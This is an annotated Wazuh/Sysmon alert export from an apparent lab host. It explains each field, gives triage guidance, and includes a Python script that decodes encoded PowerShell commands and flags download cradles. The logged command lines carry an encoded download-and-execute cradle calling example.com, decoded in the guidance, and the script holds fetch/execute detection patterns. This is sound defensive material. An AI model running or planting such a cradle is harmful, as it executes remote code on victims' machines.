data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:01.682 ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ProcessId: 384 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ParentProcessId: 17020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered event text with every eventdata field inline, the same values parsed out below. Handy to paste into a ticket whole; otherwise work from the individual fields.

data.win.eventdata.utcTime:  2025-04-24 22:56:01.682
When the activity itself happened, per Sysmon (UTC, millisecond precision). Anchor the timeline on this, not on the Wazuh timestamp.

data.win.eventdata.processGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
Sysmon's globally unique ID for this process instance. PIDs get reused, GUIDs do not: pivot on this to link the EID 1 create event to the EID 3/11/13/22 events the same process generated.

data.win.eventdata.processId:  384
Windows PID of the process. Only unique while the process lives; use processGuid for pivots and this for matching live-response output.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it is where the binary belongs (System32 here); a LOLBin copied to a user-writable path is a classic tell.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE resource. 10.0.26100.x is a Windows 11 24H2 / Server 2025 build; a mismatch with the host's OS build means the binary did not ship with this Windows.

data.win.eventdata.description:  Windows PowerShell
Description from the PE version info. Attacker-controlled metadata, trivially spoofed; verify with the hash, not the label.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version info. Same caveat as Description: cosmetic, easily faked.

data.win.eventdata.company:  Microsoft Corporation
Company name from the PE version info. Same caveat: anyone can compile a binary that claims Microsoft Corporation.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE header. Catches renamed binaries: if Image said svc.exe but this said PowerShell.EXE, it is still PowerShell.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact arguments the process started with. The key field in this alert: -EncodedCommand carries the script as base64 of UTF-16LE text. Decode it before deciding anything; the encoded blob tells you nothing by itself.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory at launch. The user's profile root here, typical for a process started from an interactive session or a script running as that user.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, as DOMAIN\user. The domain part equals the hostname (Attacker), so this is a local account, not an AD one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Join it to Security event 4624 to see how this user authenticated (console, RDP, network) and from where.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Matches the Logon ID in Security 4624/4688, so filter on it to find every process from this session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services and system, 1 and up are interactive desktops or RDP sessions. 1 here: someone is logged in at the console or over RDP.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level: Low (sandboxed), Medium (normal user), High (elevated admin), System. Medium means not elevated; a later child at High would be the privilege escalation to chase.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image on disk, algorithms per the Sysmon config (SHA256 only here). Compare to a known-good hash for this Windows build or look it up before trusting the Microsoft metadata above. Same hash across the chain means the same binary every time.

data.win.eventdata.parentProcessGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
Sysmon GUID of the parent process instance. Pivot on it to walk the process tree upward to whatever started the chain.

data.win.eventdata.parentProcessId:  17020
PID of the parent at creation time. Same reuse caveat as processId.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. powershell.exe spawned by powershell.exe is rare for a person at a prompt and common for scripts and stagers; this rule keys on exactly that pairing.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Arguments the parent started with. Identical to this process's command line: each powershell.exe re-launches the same encoded command, a self-re-spawning chain.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A difference between parentUser and user means a token or credential switch happened at creation.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:06.368+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer
Read the TargetFilename before acting on the label. It is C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1, written by powershell.exe itself (same ProcessGuid and PID 384 as the process-creation alert just above). PowerShell creates a __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder every time it starts, to test whether an AppLocker/WDAC script policy applies, and removes it afterwards. That file is a well-known benign artifact, not a transferred tool (and a .ps1 is a script, not the executable the rule name suggests), so on its own this rule 92213 hit is a false positive. Its value is as a pointer: pivot on the ProcessGuid to the EID 1 alert and work the encoded command there. Tune 92213 with a child rule that lowers the level when eventdata.image ends in powershell.exe and the file name matches that pattern, so a real payload landing in Temp is not buried under these.

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:06.368+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  126
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535366.2770627
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that produced the event. Microsoft-Windows-Sysmon means Sysmon telemetry, not a native Security-log event, so the eventID numbering below is Sysmon's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and is the same on every host, so it is a safer filter key than the name.

data.win.system.eventID:  11
Event ID within the provider. Sysmon numbering: 1 process create, 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query. Not the Security-log IDs (4624, 4688).

data.win.system.version:  2
Schema version of this event ID's field layout; it changes when Sysmon adds or renames fields, so match it when writing decoders or parsers.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs all telemetry at 4, so this says nothing about how bad the event is; rule.level does.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:03.7645310Z
UTC time the record was written to the event log. Compare with eventdata.utcTime (when the activity happened) and the alert timestamp (when Wazuh indexed it) to measure collection lag; the gap here is seconds, not separate events.

data.win.system.eventRecordID:  350596
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service (3712 here), not the process being reported. That one is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's log; open it in Event Viewer and jump to eventRecordID to see the original entry.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:03.676 ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ProcessId: 384 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1 CreationUtcTime: 2025-04-24 22:56:03.676 User: Attacker\Attcker1"
Rendered event text with every eventdata field inline, the same values parsed out below. Handy to paste into a ticket whole; otherwise work from the individual fields.

data.win.eventdata.utcTime:  2025-04-24 22:56:03.676
When the activity itself happened, per Sysmon (UTC, millisecond precision). Anchor the timeline on this, not on the Wazuh timestamp.

data.win.eventdata.processGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
Sysmon's globally unique ID for the process that wrote the file. It equals the ProcessGuid of the process-creation alert just above, so that EID 1 event is the creator; pivot there.

data.win.eventdata.processId:  384
Windows PID of the writing process. Only unique while the process lives; use processGuid for pivots.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that wrote the file. powershell.exe from System32 here; check who wrote a file before judging the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k4xjswto.1mn.ps1
Path of the file that was created. Here __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder: PowerShell writes this on every start to probe AppLocker/WDAC script enforcement and deletes it afterwards. A known benign artifact, not a dropped payload; the interesting part is the ProcessGuid that wrote it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:03.676
File creation timestamp as Sysmon recorded it. If it is earlier than utcTime, an existing file was overwritten rather than newly created; equal (as here) means a fresh file.

data.win.eventdata.user:  Attacker\\Attcker1
Account the writing process ran as. Local account on host Attacker (the domain part equals the hostname).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:10.093+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell
-EncodedCommand takes base64 of the script as UTF-16LE text (which is why every second character of the blob is an A). Decoded, the argument in this alert is:
    IEX(New-Object Net.WebClient).DownloadString('https://example.com/test')
That is a download-and-execute cradle: fetch a script over HTTPS and hand it straight to Invoke-Expression, so the payload runs in memory and never lands on disk. Decode first, then decide; the encoded form alone tells you nothing about what ran. Pull the host's DNS/proxy logs and Sysmon EID 3 and 22 around 22:56:05 UTC to see whether the fetch happened and what came back. Note the chain: parent PID 384 ran the identical command line, and this process (PID 15128) goes on to parent PID 2932 with the same command again (next process-creation alert), so each generation re-launches the cradle and rule.firedtimes keeps climbing. If this is not a sanctioned test, contain the root of the chain and the logon session (LogonId 0x26584), not one PID. example.com is a reserved documentation domain, so this is most likely a detection test on a lab host named Attacker; a real domain in that position gets the same workflow at full urgency.

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:10.093+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  123
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535370.2773388
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that produced the event. Microsoft-Windows-Sysmon means Sysmon telemetry, not a native Security-log event, so the eventID numbering below is Sysmon's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and is the same on every host, so it is a safer filter key than the name.

data.win.system.eventID:  1
Event ID within the provider. Sysmon numbering: 1 process create, 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query. Not the Security-log IDs (4624, 4688).

data.win.system.version:  5
Schema version of this event ID's field layout; it changes when Sysmon adds or renames fields, so match it when writing decoders or parsers.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs all telemetry at 4, so this says nothing about how bad the event is; rule.level does.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:07.9049338Z
UTC time the record was written to the event log. Compare with eventdata.utcTime (when the activity happened) and the alert timestamp (when Wazuh indexed it) to measure collection lag; the gap here is seconds, not separate events.

data.win.system.eventRecordID:  350610
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service (3712 here), not the process being reported. That one is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's log; open it in Event Viewer and jump to eventRecordID to see the original entry.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:05.130 ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ProcessId: 15128 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ParentProcessId: 384 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered event text with every eventdata field inline, the same values parsed out below. Handy to paste into a ticket whole; otherwise work from the individual fields.

data.win.eventdata.utcTime:  2025-04-24 22:56:05.130
When the activity itself happened, per Sysmon (UTC, millisecond precision). Anchor the timeline on this, not on the Wazuh timestamp.

data.win.eventdata.processGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
Sysmon's globally unique ID for this process instance. PIDs get reused, GUIDs do not: pivot on this to link the EID 1 create event to the EID 3/11/13/22 events the same process generated.

data.win.eventdata.processId:  15128
Windows PID of the process. Only unique while the process lives; use processGuid for pivots and this for matching live-response output.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it is where the binary belongs (System32 here); a LOLBin copied to a user-writable path is a classic tell.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE resource. 10.0.26100.x is a Windows 11 24H2 / Server 2025 build; a mismatch with the host's OS build means the binary did not ship with this Windows.

data.win.eventdata.description:  Windows PowerShell
Description from the PE version info. Attacker-controlled metadata, trivially spoofed; verify with the hash, not the label.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version info. Same caveat as Description: cosmetic, easily faked.

data.win.eventdata.company:  Microsoft Corporation
Company name from the PE version info. Same caveat: anyone can compile a binary that claims Microsoft Corporation.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE header. Catches renamed binaries: if Image said svc.exe but this said PowerShell.EXE, it is still PowerShell.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact arguments the process started with. The key field in this alert: -EncodedCommand carries the script as base64 of UTF-16LE text. Decode it before deciding anything; the encoded blob tells you nothing by itself.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory at launch. The user's profile root here, typical for a process started from an interactive session or a script running as that user.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, as DOMAIN\user. The domain part equals the hostname (Attacker), so this is a local account, not an AD one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Join it to Security event 4624 to see how this user authenticated (console, RDP, network) and from where.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Matches the Logon ID in Security 4624/4688, so filter on it to find every process from this session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services and system, 1 and up are interactive desktops or RDP sessions. 1 here: someone is logged in at the console or over RDP.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level: Low (sandboxed), Medium (normal user), High (elevated admin), System. Medium means not elevated; a later child at High would be the privilege escalation to chase.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image on disk, algorithms per the Sysmon config (SHA256 only here). Compare to a known-good hash for this Windows build or look it up before trusting the Microsoft metadata above. Same hash across the chain means the same binary every time.

data.win.eventdata.parentProcessGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
Sysmon GUID of the parent process instance. Pivot on it to walk the process tree upward to whatever started the chain.

data.win.eventdata.parentProcessId:  384
PID of the parent at creation time. Same reuse caveat as processId.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. powershell.exe spawned by powershell.exe is rare for a person at a prompt and common for scripts and stagers; this rule keys on exactly that pairing.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Arguments the parent started with. Identical to this process's command line: each powershell.exe re-launches the same encoded command, a self-re-spawning chain.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A difference between parentUser and user means a token or credential switch happened at creation.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
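
The decode-then-decide step from the guidance above, as an added example (not SOCscribe, Wazuh or Sysmon code): pull the -EncodedCommand argument out of a Sysmon EID 1 command line, decode it as base64 of UTF-16LE, and flag a download cradle when the script both fetches remote content and executes it. The sample command line is the one from this alert's data.win.eventdata.commandLine field; the list of switch spellings and the fetch/execute keyword sets are this example's own assumptions.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Command line copied from the data.win.eventdata.commandLine field of the alert
# above (escaped backslashes collapsed). The code around it is an added example,
# not part of SOCscribe, Wazuh or Sysmon.
SAMPLE_CMDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'-NoLogo -NoProfile -EncodedCommand '
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in practice (assumption: extend the list if your logs show others).
# -ExecutionPolicy cannot match because whitespace must follow the prefix.
_ENC_SWITCH = re.compile(
    r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
# Download-cradle primitives: something that fetches plus something that executes.
_FETCH_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest"
    r"|\bIWR\b|Invoke-RestMethod|\bIRM\b|Start-BitsTransfer",
    re.IGNORECASE,
)
_EXEC_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
_URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand, or None if there is none.

    The value is base64 of the script encoded as UTF-16LE, which is why every
    second byte is 0x00 and the blob is full of 'A' characters.
    """
    m = _ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None  # garbage after the switch: hand it to a human
    return raw.decode("utf-16-le", errors="replace")


def find_urls(script: str) -> List[str]:
    """Every http(s) URL in the decoded script, for DNS/proxy pivots."""
    return _URL_RE.findall(script)


def is_download_cradle(script: str) -> bool:
    """True when the script both fetches remote content and executes it."""
    return bool(_FETCH_RE.search(script) and _EXEC_RE.search(script))


def triage_command_line(cmdline: str) -> Dict[str, object]:
    """Decode and classify one Sysmon EID 1 CommandLine value."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "urls": [], "download_cradle": False}
    return {
        "encoded": True,
        "script": script,
        "urls": find_urls(script),
        "download_cradle": is_download_cradle(script),
    }


if __name__ == "__main__":
    verdict = triage_command_line(SAMPLE_CMDLINE)
    print("decoded        :", verdict["script"])
    print("urls           :", verdict["urls"])
    print("download cradle:", verdict["download_cradle"])
```

Run against the alert's command line this returns the cradle IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') with the URL extracted for a DNS/proxy pivot. Invalid base64 after the switch is returned as None rather than raised, so a batch run over many alerts keeps going and the odd one out gets a human.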

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:10.096+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer
